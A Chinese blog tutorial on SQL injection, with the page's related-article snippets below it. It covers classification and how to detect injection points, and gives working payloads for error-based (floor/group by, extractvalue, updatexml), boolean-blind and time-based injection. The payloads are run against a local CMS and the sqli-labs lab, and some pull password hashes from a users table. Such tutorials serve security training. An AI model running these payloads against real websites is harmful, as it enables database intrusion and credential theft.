详解 SQL注入(盲注)

最新推荐文章于 2024-06-19 13:35:01 发布
最新推荐文章于 2024-06-19 13:35:01 发布
阅读量725 收藏 4
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46397814/article/details/107730139
版权

0x01 SQL注入漏洞的分类

根据不同的标准,SQL注入漏洞可以有不同的分类。
根据数字类型分类,SQL注入分为两大基本类型。
数字型拼接到SQL语句中的参数,是以数字出现的,即引号两边没有单双引号。
字符型拼接到SQL语句中的参数,是以文本出现的,即引号两边有单双引号。
注入手法

  1. 联合查询(Union Query SQL Injection)
  2. 报错注⼊(Error-Based SQL Injection)
  3. 布尔盲注(Boolean-based Blind SQL Injection)
  4. 延时注⼊(Time-based Blink SQL Injection)
  5. 堆叠查询(Stacked Queries SQL Injection)
    由于联合查询已经在之前发布过详细的相关介绍,在这里不做过多叙述,可以看看我的其他博客。

提交参数的方式

  1. GET 注入
  2. POST 注入
  3. Cookie 注入
  4. HTTP 注入

注入点的位置

  1. URL 注入
  2. 搜索框注入
  3. 留言板注入
  4. 登录框注入

0x02 注入点的判断

在疑似注入点的地方或者参数后面尝试提交数据,从而进行判断是否存在SQL注入漏洞。

在这里插入图片描述

回显

  1. 数据库中的内容是否会回现在网页中

数据库报错

  1. 数据库报错信息是否会回显在⽹⻚中
  2. 提交的数据是字符型还是数字型
  3. 如果是字符型数据,闭合⽅式是什么?

布尔类型的状态

  1. 显示的⻚⾯不同,形成对⽐
  2. ⻚⾯正常或者不正常

延时

  1. 让数据库沉睡响应的秒数

注入点判断-实例一

  1. http://192.168.16.109/cms/show.php?id=33

  2. http://192.168.16.109/cms/show.php?id=32

  3. http://192.168.16.109/cms/show.php?id=34
    #有回显,数据库中的内容会显示在⽹⻚中

  4. http://192.168.16.109/cms/show.php?id=33’
    #出现数据库报错,syntax to use near ’ ’ ’ at line 1
    #数字型注入

  5. ?id=34 and 1=1

  6. ?id=34 and 1=2
    #有布尔类型状态

  7. ?id=34 and sleep(5)
    #有延时

注入点判断-实例二

  1. http://192.168.16.109/sali-labs-master/less-1/?id=1

  2. http://192.168.16.109/sali-labs-master/less-1/?id=2
    #有回显

  3. http://192.168.16.109/sali-labs-master/less-1/?id=1’
    #出现数据库报错,syntax to use near ’ ’ 1’ ’ ’ LIMIT 0,1 at line 1
    #字符型注入
    #闭合方式[ ’ ]

  4. ?id=1’ and 1=1–+

  5. ?id=1’ and 1=2–+
    #有布尔类型

  6. ?id=1’ and sleep(5) --+
    #有延时

0x03 SQL基本注入手法

报错注入

group by 重复键冲突

  1. ?id=22 and (select 1 from (select count(* ) , concat(0x5e, (select database( )),0x5e, floor(rand()*2))x from information_ schema. tables group by x)a)
  2. ?id=22 and (select 1 from (select count(* ) , concat(0x5e, (select password from cms_users limit 0,1),0x5e, floor(rand()*2))x from information_ schema. tables group by x)a)

extractvalue

  1. ?id=2 and extractvalue(1,concat(0x5e,(select database()),0x5e))
    #select database() 查询的内容可以根据自己的情况改变

updatexml

  1. ?id=2 and updatexml(1,concat(0x5e,(select database()),0x5e),1)
  2. ?id=2 and updatexml(1,concat(0x5e,(select substr(password,1,16) from
    cms_users),0x5e),1)
  3. ?id=2 and updatexml(1,concat(0x5e,(select substr(password,17,32) from
    cms_users),0x5e),1)

布尔盲注

页面中有布尔类型状态,可以根据布尔类型状态对数据库内容进行判断.

数据库名爆破

  1. ?id=33 and database()=‘xxx’
    #不知道数据库名有多少位
    #不知道数据库名的字符集合
    #爆破成本很⾼

数据库名称的长度

  1. ?id=33 and length (database())=3
    #⻚⾯正常,说明数据库名字的⻓度是3

按位测试

  1. #第一位
  2. ?id=33 and ascii(substr(database(),1,1))=99
  3. #99
  4. #c
  6. #第二位
  7. ?id=33 and ascii(substr(database(),2,1))=109
  8. #99 109
  9. #c m
  11. #第三位
  12. ?id=33 and ascii(substr(database(),2,1))=115
  13. #99 109 115
  14. #c m s
  15. 爆破出数据库的名称是 cms

延时注入

利用sleep()语句的延时性,以时间线作为判断条件,和布尔类型的注入一样属于盲注

数据库名字的长度

  1. ?id=2’ and if(length(database())=8,sleep(5),1) --+
    #页面有延时,说明猜对了

数据库名字

  1. ?id=2’ and if(ascii(substr(database(),3,1))=99,sleep(5),1) --+
  2. #115 101 99
  3. #s e c

以上四种基本注入手法只有联合查询和报错注入可以较快地从数据库中查出目标数据,而盲注的成本较高,在这里就必须要提到了SQL注入的神器 sqlmap,在后面我会写到关于sqlmap的原理和具体的用法,请大家关注我哦! -_-

aruah
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入()
a12332251的博客
12-07 926
SQL
SQL注入2——(重学)
qq_52263650的博客
11-07 3780
SQL注入2——布尔型(重学)
SQL注入
xiao_he0123的博客
03-20 6996
SQL注入前言一、分类二、具体解析1.基于布尔的sql首先要先了解一下sql注入截取字符串常用的函数:(1)mid()函数(2)substr()函数(3)left()函数具体注入方法2.基于时间的SQL3.基于报错的SQL1.extractvalue()函数2.uodatexml()函数3.floor()函数 前言 何为就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面 一、分类 分为三类: (1)基于布尔的SQL (2)基于事
sql注入
最新发布
weixin_64815500的博客
06-19 960
sql注入关于无回显用到的sqli-labs靶场为例子讲解常用类型以及函数。面试或者打ctf可用作参考
常见SQL注入类型及原理
1stPeak's Blog
05-31 5178
SQL注入 Mysql基础 1、Mysql安装 这里我们直接使用phpstudy集成环境中的mysql 2、Mysql常用命令 (1)mysql本地连接 mysql -h localhost -uroot –proot 参数 说明 -h 表示数据库连接地址,连接本机可不填,直接mysql -uroot -p -u 表示要登录的用户 -p 表示使用密码登录 默认账/密:root/root :登录mysql时,-p后面不能有空格加密码,但-p空格,后面不加值是
sql特点_SQL注入介绍及分类解读
weixin_42526166的博客
01-14 962
SQL全称是Structured Query Language,是一种结构化的查询语言,用于与数据库进行交互并能够被数据库解析。SQL注入攻击是一种常见的注入攻击类型。攻击方式在用户与程序进行交互时发生的。如在表单输入、搜索框输入功能中插入SQL命令,然后发送到服务端。服务端对数据进行了解析执行,并执行了一些非预期的操作。SQL注入危害1、从数据库中读取敏感数据;2、篡改数据库数据;3、对数据库执...
SQL注入之基于布尔的详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
SQL注入思路详解
12-14
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序在处理用户输入数据时的不足,使得攻击者能够构造恶意的SQL语句来控制或篡改数据库。本文将深入解析SQL注入的思路,帮助你理解和防范这种攻击。 首先,SQL...
傀儡SQL批量扫描注入工具
07-14
在网络安全领域,SQL注入是一种常见的攻击手段,它利用网站应用程序对用户输入的数据处理不当,恶意篡改SQL查询语句,获取、修改、删除数据库中的敏感信息。为了防御这种攻击,以及进行安全测试,开发者和安全研究...
sqlmap SQL注入扫描软件
03-29
**SQLMap:强大的SQL注入扫描工具** SQLMap是一款开源的自动化工具,专为检测和利用SQL注入漏洞而设计。它的核心功能是通过检测网站应用程序是否存在SQL注入漏洞,进而帮助安全研究人员或渗透测试人员进行安全评估...
SQL注入-
m0_72125469的博客
11-24 252
SQL注入系列-
SQL注入技巧-暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
SQL(原理概述、分类)
热门推荐
小赵同学的博客
12-29 2万+
原理 的分类 常用函数 的利用方法 一、SQL概述 1.如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的来获取信息。 2.是不能通过直接显示的途径来获取数据库数据的方法。 可以分为三类: 布尔 时间 报错型 1、布尔 查询是不需要返回结果的,仅判断语句是否正常执行即可,所以其返回可以看到一个布尔值,正常显示为true,报错或者是其他不正常显示为False 查询语句: SELECT userid FROM ne
SQL注入(小白的学习)
lgsyydsa的博客
06-04 576
对length列从小到大或者从大到小排列,会发现有一些结果的长度与大部分的长度不同,如果还是不知道可以在下面response的render中会有图显示。所以我们可以通过修改substr中第二个参数来进行判断,但是这样会浪费大量的时间。意:limit 0,1 表示是第一张表,如果爆出来的表不太像有flag的,可以修改limit 第一个参数,继续爆下一个表名。第一个参数由于不知道表名长度,可以设置为10,第二个参数设置同上,爆破完后将长度进行排序可知表名为flag,这很ctfhub。所以先判断数据库的长度。
SQL注入类型
yggcwhat
12-13 2451
SQL注入类型详解 SQL 注入是指web应用程序对用户输入数据控制不严格,导致用户输入数据被拼接到SQL语句中被数据库执行导致的安全问题,按照注入方式可以分为联合注入、布尔、时间、堆叠注入以及报错注入等五种注入方式。在sql注入时影响返回单行的不仅仅是sql 语句的问题,有时是代码层面的问题。 判断注入是否存在 and 1=1,and 1=2 返回页面数据不同 ?id=3-1,返回数据内容不同 添加’、""以及其他特殊符号报错 … 联合注入 前提要求:数据会进行回显,页面有显位符,在一个在一个网
6-30 无回显sql注入() 基于位置注入 sqlmap参数
weixin_44371476的博客
07-02 2204
基于时间的 表名的字典 1%27%20and%20if(ascii(substr(database(),1,1))>0,sleep(2),1)%20–+ ?id=1’ and if(ascii(substr(database(),1,1))=0,sleep(2),1) --+ ?id=1’ and if(left(database(),1)=‘s’,sleep(2),1) --+ 基于布尔的 ?id=-1%27%20or%20left(database(),1)=%27u%27%20...
SQL注入攻击详解
程序员世杰
03-03 8060
一、什么是SQL注入 SQL 注入SQLi)是一种注入攻击,,可以执行恶意 SQL 语句。它通过将任意 SQL 代码插入数据库查询,使攻击者能够完全控制 Web 应用程序后面的数据库服务器。攻击者可以使用 SQL 注入漏洞绕过应用程序安全措施;可以绕过网页或 Web 应用程序的身份验证和授权,并检索整个 SQL 数据库的内容;还可以使用 SQL 注入来添加,修改和删除数据库中的记录。 SQL ...
SQL注入利用方法
小白渣的博客
02-27 1896
靠 真大佬写的 太太太qiang 辽 !!! 前言 最近做了些基于布尔和基于时间的CTF题,掌握了CTF题中SQL的三种解法,收获很大,于是结合题目分享一下。 BASE-Blind-Inject 题目信息 题干分析 第一次走进误区,刚看到这道题的时候看到了登录框,第一印象应该就是简单的闭合注入,测试后发现是双引号闭合,所以构造payload注入 " or 1=1# 果...
SQL报错型教程(原理全剖析)
Pz_mstr's Blog
08-21 1万+
深入分析基于报错的sql原理,解密“公式”的奥秘

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值